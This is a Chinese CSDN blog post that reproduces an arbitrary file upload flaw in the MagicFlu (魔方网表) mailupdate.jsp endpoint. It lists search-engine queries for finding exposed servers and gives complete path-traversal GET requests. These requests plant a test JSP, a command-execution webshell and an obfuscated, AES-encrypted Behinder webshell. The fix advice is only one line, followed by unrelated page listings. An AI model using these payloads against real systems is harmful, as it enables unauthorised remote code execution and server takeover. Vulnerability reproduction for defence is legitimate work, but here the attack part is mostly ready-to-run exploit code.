魔方网表 mailupdate.jsp 任意文件上传

于 2024-09-13 11:37:15 发布
阅读量286 收藏 3
点赞数 7
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142206335
版权

0x01 漏洞描述:

魔方网表帮助其搭建了支持信创环境的端到端的一站式数据智能填报系统,实现数据收集模板个性化定义,收集任务集中管控,结构化数据存储、分析及呈现等功能。魔方网表mailupdate.jsp接口存在任意文件上传漏洞

0x02 搜索语句:

Fofa:icon_hash="694014318"

Hunter:body="/magicflu/html/login/img/leftbottom.png"

Quake:body="/magicflu/html/login/img/leftbottom.png"

0x03 漏洞复现:

文件上传:

GET /magicflu/html/mail/mailupdate.jsp?messageid=/../../../test2.jsp&messagecontent=%3C%25+out.println%28%22tteesstt1%22%29%3B%25%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: your-ip

访问路径进行访问 /magicflu/test2.jsp

上传jsp小马

GET /magicflu/html/mail/mailupdate.jsp?messageid=/../../../test3.jsp&messagecontent=%3C%25+if%28request.getParameter%28%22cmd%22%29+%21%3D+null%29+%7B+java.io.InputStream+in+%3D+Runtime.getRuntime%28%29.exec%28request.getParameter%28%22cmd%22%29%29.getInputStream%28%29%3B+int+a+%3D+-1%3B+byte%5B%5D+b+%3D+new+byte%5B2048%5D%3B+out.print%28%22%3Cpre%3E%22%29%3B+while+%28%28a+%3D+in.read%28b%29%29+%21%3D+-1%29+%7B+out.print%28new+String%28b%29%29%3B+%7D+out.print%28%22%3C%2Fpre%3E%22%29%3B+%7D+%25%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: your-ip

访问上传地址

http://your-ip/magicflu/test3.jsp?cmd=whoami

 

大马上传建立连接 执行密码cmd

GET /magicflu/html/mail/mailupdate.jsp?messageid=/../../../test4.jsp&messagecontent=%3C%25%21+public+byte%5B%5D+AJ173%28String+Strings%2CString+k%29+throws+Exception+%7B+javax.crypto.Cipher+BB390K+%3D+javax.crypto.Cipher.getInstance%28%22AES%2FECB%2FPKCS5Padding%22%29%3BBB390K.init%28javax.crypto.Cipher.DECRYPT_MODE%2C+%28javax.crypto.spec.SecretKeySpec%29+Class.forName%28%22javax.crypto.spec.SecretKeySpec%22%29.getConstructor%28byte%5B%5D.class%2C+String.class%29.newInstance%28k.getBytes%28%29%2C+%22AES%22%29%29%3Bbyte%5B%5D+bytes%3Btry%7Bint%5B%5D+aa+%3D+new+int%5B%5D%7B122%2C+113%2C+102%2C+113%2C+62%2C+101%2C+100%2C+121%2C+124%2C+62%2C+82%2C+113%2C+99%2C+117%2C+38%2C+36%7D%3BString+ccstr+%3D+%22%22%3Bfor+%28int+i+%3D+0%3B+i+%3C+aa.length%3B+i%2B%2B%29+%7B+aa%5Bi%5D+%3D+aa%5Bi%5D+%5E+0x010%3Bccstr+%3D+ccstr+%2B+%28char%29+aa%5Bi%5D%3B%7DClass+clazz+%3D+Class.forName%28ccstr%29%3B+Object+decoder+%3D+clazz.getMethod%28%22getDecoder%22%29.invoke%28null%29%3Bbytes+%3D++%28byte%5B%5D%29+decoder.getClass%28%29.getMethod%28%22decode%22%2C+String.class%29.invoke%28decoder%2C+Strings%29%3B%7Dcatch+%28Throwable+e%29%7Bint%5B%5D+aa+%3D+new+int%5B%5D%7B99%2C+101%2C+126%2C+62%2C+125%2C+121%2C+99%2C+115%2C+62%2C+82%2C+81%2C+67%2C+85%2C+38%2C+36%2C+84%2C+117%2C+115%2C+127%2C+116%2C+117%2C+98%7D%3BString+ccstr+%3D+%22%22%3Bfor+%28int+i+%3D+0%3B+i+%3C+aa.length%3B+i%2B%2B%29+%7Baa%5Bi%5D+%3D+aa%5Bi%5D+%5E+0x010%3Bccstr+%3D+ccstr+%2B+%28char%29+aa%5Bi%5D%3B%7DClass+clazz+%3D+Class.forName%28ccstr%29%3Bbytes+%3D+%28byte%5B%5D%29+clazz.getMethod%28%22decodeBuffer%22%2C+String.class%29.invoke%28clazz.newInstance%28%29%2C+Strings%29%3B%7Dbyte%5B%5D+result+%3D+%28byte%5B%5D%29+BB390K.getClass%28%29.%2F%2AZ6J167Pm27%2A%2FgetDeclaredMethod%2F%2AZ6J167Pm27%2A%2F%28%22doFinal%22%2C+new+Class%5B%5D%7Bbyte%5B%5D.class%7D%29.invoke%28BB390K%2Cnew+Object%5B%5D%7Bbytes%7D%29%3Breturn+result%3B%7D+%25%3E%3C%25++try+%7B++String+KcIG0Ji+%3D+%22dfff0a7fa1a55c8c%22%3B++session.putValue%28%22u%22%2C+KcIG0Ji%29%3B++byte%5B%5D+I425f1L+%3D+AJ173+%28request.getReader%28%29.readLine%28%29%2CKcIG0Ji%29%3B++java.%2F%2AZ6J167Pm27%2A%2Flang.%2F%2AZ6J167Pm27%2A%2Freflect.Method+AJ173+%3D+Class.forName%28%22java.lang.ClassLoader%22%29.getDeclaredMethod%2F%2AZ6J167Pm27%2A%2F%28%22defineClass%22%2Cbyte%5B%5D.class%2Cint%2F%2A%2A%2F.class%2Cint%2F%2A%2A%2F.class%29%3B++AJ173.setAccessible%28true%29%3B++Class+i+%3D+%28Class%29AJ173.invoke%28Thread.currentThread%28%29.%2F%2AZ6J167Pm27%2A%2FgetContextClassLoader%28%29%2C+I425f1L+%2C+0%2C+I425f1L.length%29%3B++Object+Q18i+%3D+i.%2F%2AZ6J167Pm27%2A%2FnewInstance%28%29%3B++Q18i.equals%28pageContext%29%3B+%7D+catch+%28Exception+e%29+%7B%7D+%25%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: your-ip

 冰蝎访问

0x04 修复建议:

厂商已发布补丁请即时修复

iSee857
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
蓝凌OA custom.jsp 任意文件读取漏洞批量扫描脚本.py
08-28
自己写的批量扫描脚本,很好用,可以借鉴一下
jsp--upload.rar_jsp 文件_upload.jsp _文件上传
09-23
在这个名为"jsp--upload.rar"的压缩包中,我们重点关注的是文件上传功能,具体体现在"upload.jsp"这个文件上。 文件上传Web应用中的常见需求,它允许用户将本地文件传输到服务器,以便于存储、处理或共享。在JSP...
EtMi832#PeiQi-WIKI-POC#泛微OA sysinterfacecodeEdit.jsp 页面任意文件上传1
07-25
泛微OA sysinterface/codeEdit.jsp 页面任意文件上传 WooYun-2015-0155705漏洞描述泛微OA sysinterface
mtc.rar_MTc_jsp_jsp 文件管理_mtc.jsp_文件管理
09-23
”这揭示了项目的核心特性,即它是一个基于JSP的文件管理系统,能够对操作系统的各个磁盘进行文件操作,包括查看、上传、下载、删除等基本功能,可能还涉及到权限控制和文件分类等高级功能。 【标签解析】 标签包括...
jindutiao.rar_jsp文件上传
09-23
【标题】"jindutiao.rar_jsp文件上传"涉及的知识点主要集中在使用JSP进行文件上传,并结合HTML和CSS实现进度条动画效果,以提供用户友好的交互体验。在这个项目中,开发者可能使用了AJAX技术来实现异步文件上传,...
Web安全之SQL注入:如何预防及解决
J老熊
09-07 1418
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1808
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全实训八(y0usef靶机渗透实例)
Wrop的博客
09-12 154
y0usef靶机渗透实例
网络安全(黑客)自学
白帽子凯哥聊黑客
09-04 1751
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全宣传周 | DNS安全威胁与应对措施分享
最新发布
weixin_53018687的博客
09-12 681
然而,DNS协议在设计初期只注重功能的实现,未充分考虑安全验证机制,缺乏有效的安全防御手段,DNS协议数据包往往能够在网络中畅通无阻,为攻击者提供了可乘之机,这一天生的设计缺陷使得DNS系统天然地成为了安全领域的薄弱环节。DNS劫持:DNS劫持是指攻击者通过篡改DNS解析结果,将用户的流量重定向到不同的IP地址,通常是恶意网站。DNS泛洪攻击:DNS洪泛攻击是一种拒绝服务攻击,攻击者通过发送大量的DNS请求,通常是伪造的或毫无意义的查询,消耗DNS服务器的资源,使其无法响应合法的查询请求。
国家网络安全宣传周 | 2024年网络安全领域重大政策法规一览
WAJXY2021的博客
09-12 762
整理了2024年国内发布的网络安全领域相关政策法规,希望能为广大从业者与关注者提供相关参考,共同促进网络安全生态的健康发展。
深入解析反射型 XSS 与存储型 XSS:原理、危害与防范
2301_77160226的博客
09-05 849
反射型 XSS 和存储型 XSS 都是常见的 XSS 攻击类型,它们的原理和危害有所不同,但都可以对用户造成严重的危害。为了防范 XSS 攻击,我们需要采取一系列的措施,如输入验证和过滤、输出编码、使用安全的 API 和框架等。同时,我们也需要教育用户提高安全意识,不要点击来自不可信来源的链接,不要在不可信的网站上输入敏感信息。
Web安全与网络安全:SQL漏洞注入
hong161688的博客
09-10 713
Web安全领域,SQL注入漏洞(SQL Injection Vulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行详细阐述。
Web安全文件上传漏洞和案例示范
J老熊
09-09 984
Web应用程序中,文件上传功能广泛应用,特别是在电商交易系统中,用户上传商品图片、订单文件等操作十分常见。然而,文件上传功能若未被妥善处理,将成为攻击者利用的突破口。本文将以电商交易系统为例,深入分析文件上传过程中的常见安全漏洞,提供相应的解决方案。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-08 1107
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
【网络安全 | 渗透工具】IIS 短文件名枚举工具—shortscan安装使用教程
等风来
09-09 228
ShortScan 是一种用于在 Microsoft IIS (Internet Information Services) Web 服务器上进行短文件名枚举的工具。该工具可以帮助攻击者利用 IIS 的文件名处理特性,通过预测性扫描枚举服务器上的文件和目录名称。
Microsoft SC-100: Microsoft 网络安全架构师
Candy_2302的博客
09-07 773
Microsoft SC-100: Microsoft 网络安全架构师,作为 Microsoft 网络安全架构师,你要将网络安全策略转化为保护组织的资产、业务和运营的功能。 你要设计、指导实现和维护遵循零信任原则和最佳做法的安全性解决方案,包括标识、设备、数据、AI、应用程序、网络、基础结构和 DevOps 的安全策略。 此外,还要设计针对治理和风险合规性 (GRC)、安全运营和安全态势管理的解决方案。
ISO 21434与网络安全管理系统(CSMS)的协同作用
yayuanjingkeji的博客
09-09 243
综上所述,ISO/SAE 21434为汽车行业提供了一个全面的网络安全管理框架,与R155法规中的CSMS要求紧密相关。通过遵循ISO/SAE 21434的指导,汽车制造商可以更有效地满足或超越R155对网络安全管理的要求,确保车辆在整个生命周期内的网络安全
万户oa officeserver.jsp任意文件上传漏洞复现
12-22
这是一个常见的漏洞,攻击者可以利用它上传恶意文件到服务器上,从而对系统进行攻击。首先,攻击者需要找到目标系统上的OA officeserver.jsp文件,并确定该文件存在上传漏洞。接下来,攻击者可以通过浏览器或其他工具访问officeserver.jsp文件,并上传恶意的文件,比如Webshell文件。 在上传过程中,攻击者可能需要绕过一些安全控制,可能需要修改请求头或使用特定的文件格式来欺骗服务器。一旦成功上传了恶意文件,攻击者就可以利用它来执行任意的命令,比如查看、修改和删除服务器上的文件,甚至获取系统权限。 为了防止这种漏洞的发生,系统管理员可以采取一些措施,比如限制上传文件的类型和大小、检查上传文件的内容、限制上传文件的访问权限等。此外,及时更新系统补丁,加强对系统的监控和日志审计也是非常重要的。对于已知的漏洞,及时修复和更新系统也是必不可少的。 总的来说,要防范万户OA officeserver.jsp任意文件上传漏洞,就需要管理员有意识地加强对系统的安全防护,加强对漏洞的排查和修复,以及加强对系统的监控和审计。这样才能更好地保护系统和信息安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值